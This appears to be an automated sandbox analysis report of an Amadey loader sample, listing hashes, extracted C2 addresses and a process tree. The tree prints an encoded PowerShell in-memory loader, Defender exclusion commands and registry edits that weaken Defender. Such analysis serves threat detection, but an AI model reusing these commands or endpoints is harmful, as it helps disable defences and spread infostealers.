Analysis

  • max time kernel
    67s
  • max time network
    97s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    14-05-2024 08:00

Errors

Reason
Machine shutdown

General

  • Target

    7e89d67f17a156a6a7ca9c926cb56d17e81558470d8eb5cad2c11b8337fbc7d9.exe

  • Size

    1.7MB

  • MD5

    86176b18d6bbcae122b4903627976d73

  • SHA1

    dd970ac07657cafe01914b485ede0d9a2d9160a6

  • SHA256

    7e89d67f17a156a6a7ca9c926cb56d17e81558470d8eb5cad2c11b8337fbc7d9

  • SHA512

    a52a6b7598732c2e75ddaecb3ca05c7c87273b3bfee9fc8c6505bc32f15b9ffbde4b1b60a569608692a071250e83d82cba872b48b22902d8b92975d57f5a46f1

  • SSDEEP

    49152:MOEwgetOc5ZEk5Qr4oEoOkzvvGtroVEFhoe5eBp+:M/aOA4ZOkrorbY+

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • XMRig Miner payload 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 35 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7e89d67f17a156a6a7ca9c926cb56d17e81558470d8eb5cad2c11b8337fbc7d9.exe
    "C:\Users\Admin\AppData\Local\Temp\7e89d67f17a156a6a7ca9c926cb56d17e81558470d8eb5cad2c11b8337fbc7d9.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:552
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:1020
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:1584
        • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2420
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2016
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1576
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                  PID:2648
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                    PID:2068
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1628
                    • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                      "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1580
                    • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                      "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                      7⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2676
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                      7⤵
                        PID:560
                        • C:\Windows\SysWOW64\choice.exe
                          choice /C Y /N /D Y /T 3
                          8⤵
                            PID:2416
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 396
                        6⤵
                        • Program crash
                        PID:3128
                    • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:964
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        6⤵
                          PID:2144
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          6⤵
                            PID:2292
                        • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3552
                        • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                          5⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          • Suspicious use of WriteProcessMemory
                          PID:3404
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                            6⤵
                            • Suspicious use of WriteProcessMemory
                            PID:560
                            • C:\Windows\SysWOW64\sc.exe
                              Sc stop GameServerClient
                              7⤵
                              • Launches sc.exe
                              PID:3880
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService remove GameServerClient confirm
                              7⤵
                              • Executes dropped EXE
                              PID:2596
                            • C:\Windows\SysWOW64\sc.exe
                              Sc delete GameSyncLink
                              7⤵
                              • Launches sc.exe
                              PID:1268
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService remove GameSyncLink confirm
                              7⤵
                              • Executes dropped EXE
                              PID:4480
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:796
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService start GameSyncLink
                              7⤵
                              • Executes dropped EXE
                              PID:3728
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                            6⤵
                              PID:4540
                              • C:\Windows\SysWOW64\sc.exe
                                Sc stop GameServerClientC
                                7⤵
                                • Launches sc.exe
                                PID:2036
                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                GameService remove GameServerClientC confirm
                                7⤵
                                • Executes dropped EXE
                                PID:4936
                              • C:\Windows\SysWOW64\sc.exe
                                Sc delete PiercingNetLink
                                7⤵
                                • Launches sc.exe
                                PID:1760
                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                GameService remove PiercingNetLink confirm
                                7⤵
                                • Executes dropped EXE
                                PID:2148
                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:460
                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                GameService start PiercingNetLink
                                7⤵
                                • Executes dropped EXE
                                PID:4788
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                              6⤵
                                PID:1784
                                • C:\Windows\SysWOW64\sc.exe
                                  Sc delete GameSyncLinks
                                  7⤵
                                  • Launches sc.exe
                                  PID:2468
                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                  GameService remove GameSyncLinks confirm
                                  7⤵
                                  • Executes dropped EXE
                                  PID:128
                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                  GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:484
                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                  GameService start GameSyncLinks
                                  7⤵
                                  • Executes dropped EXE
                                  PID:1520
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                6⤵
                                  PID:4472
                              • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:828
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  6⤵
                                    PID:968
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    6⤵
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3352
                                • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:128
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    6⤵
                                      PID:3188
                                  • C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3564
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADUALAAgADAAeAAxADcALAAgADAAeABEAEUALAAgADAAeABCAEMALAAgADAAeABEAEYALAAgADAAeAA0ADAALAAgADAAeAA2ADgALAAgADAAeAA1ADcALAAgADAAeABDADUALAAgADAAeAA0ADQALAAgADAAeAA5ADQALAAgADAAeAA4ADAALAAgADAAeAA1ADEALAAgADAAeAA5ADkALAAgADAAeAA1ADgALAAgADAAeAA1ADkALAAgADAAeABBADAALAAgADAAeAAzAEEALAAgADAAeABDADgALAAgADAAeAAwADUALAAgADAAeAA2ADgALAAgADAAeAAxADMALAAgADAAeABGADgALAAgADAAeABFAEMALAAgADAAeAA0ADYALAAgADAAeAA4ADQALAAgADAAeABFADIALAAgADAAeABCADMALAAgADAAeAA1AEYALAAgADAAeABGADMALAAgADAAeAAxADMALAAgADAAeAAwAEYAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEUANgAsACAAMAB4AEYANAAsACAAMAB4AEMARAAsACAAMAB4ADcAQgAsACAAMAB4AEIAQwAsACAAMAB4AEIAQgAsACAAMAB4ADMAMgAsACAAMAB4AEQAMgAsACAAMAB4ADAAMAAsACAAMAB4AEYANgAsACAAMAB4AEYAMwAsACAAMAB4ADEAQQAsACAAMAB4AEQANQAsACAAMAB4AEQAOAAsACAAMAB4AEEANgAsACAAMAB4ADIAQQApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                      6⤵
                                      • UAC bypass
                                      • Windows security bypass
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2852
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe" -Force
                                        7⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:436
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                        7⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4300
                                        • C:\Users\Admin\Pictures\cG27JiktH7vR87U83tNdJ3fS.exe
                                          "C:\Users\Admin\Pictures\cG27JiktH7vR87U83tNdJ3fS.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          PID:1832
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            9⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            PID:3952
                                          • C:\Users\Admin\Pictures\cG27JiktH7vR87U83tNdJ3fS.exe
                                            "C:\Users\Admin\Pictures\cG27JiktH7vR87U83tNdJ3fS.exe"
                                            9⤵
                                              PID:232
                                          • C:\Users\Admin\Pictures\Ildd3chC6OzNLVobDyp7zkaD.exe
                                            "C:\Users\Admin\Pictures\Ildd3chC6OzNLVobDyp7zkaD.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4812
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:436
                                            • C:\Users\Admin\Pictures\Ildd3chC6OzNLVobDyp7zkaD.exe
                                              "C:\Users\Admin\Pictures\Ildd3chC6OzNLVobDyp7zkaD.exe"
                                              9⤵
                                                PID:756
                                            • C:\Users\Admin\Pictures\Ig4egc7EVdYuRtWN8d0yuWRu.exe
                                              "C:\Users\Admin\Pictures\Ig4egc7EVdYuRtWN8d0yuWRu.exe" /s
                                              8⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Writes to the Master Boot Record (MBR)
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1944
                                            • C:\Users\Admin\Pictures\dIWlZ2z21QRUf7bC92mXkSeg.exe
                                              "C:\Users\Admin\Pictures\dIWlZ2z21QRUf7bC92mXkSeg.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              PID:2968
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nologo -noprofile
                                                9⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:5240
                                              • C:\Users\Admin\Pictures\dIWlZ2z21QRUf7bC92mXkSeg.exe
                                                "C:\Users\Admin\Pictures\dIWlZ2z21QRUf7bC92mXkSeg.exe"
                                                9⤵
                                                  PID:2100
                                              • C:\Users\Admin\Pictures\hPBqdh2ofADTFsVWrMAM1ZNQ.exe
                                                "C:\Users\Admin\Pictures\hPBqdh2ofADTFsVWrMAM1ZNQ.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                PID:460
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  9⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:2260
                                                • C:\Users\Admin\Pictures\hPBqdh2ofADTFsVWrMAM1ZNQ.exe
                                                  "C:\Users\Admin\Pictures\hPBqdh2ofADTFsVWrMAM1ZNQ.exe"
                                                  9⤵
                                                    PID:5572
                                                • C:\Users\Admin\Pictures\f5Oo7EPjN82EKuHbSgleONJp.exe
                                                  "C:\Users\Admin\Pictures\f5Oo7EPjN82EKuHbSgleONJp.exe"
                                                  8⤵
                                                    PID:4972
                                                  • C:\Users\Admin\Pictures\Wo9s7LQuBK0TQA3ljlGABVKI.exe
                                                    "C:\Users\Admin\Pictures\Wo9s7LQuBK0TQA3ljlGABVKI.exe"
                                                    8⤵
                                                      PID:5220
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSAC48.tmp\Install.exe
                                                        .\Install.exe /tEdidDDf "385118" /S
                                                        9⤵
                                                          PID:5580
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                            10⤵
                                                              PID:5668
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                11⤵
                                                                  PID:5712
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                    12⤵
                                                                      PID:5728
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                        13⤵
                                                                          PID:5748
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                      11⤵
                                                                        PID:5764
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                          12⤵
                                                                            PID:5784
                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              13⤵
                                                                                PID:5800
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                            11⤵
                                                                              PID:5816
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                12⤵
                                                                                  PID:5832
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    13⤵
                                                                                      PID:5848
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                  11⤵
                                                                                    PID:5860
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                      12⤵
                                                                                        PID:5880
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          13⤵
                                                                                            PID:5900
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                        11⤵
                                                                                          PID:5916
                                                                                          • C:\Windows\SysWOW64\cmd.exe
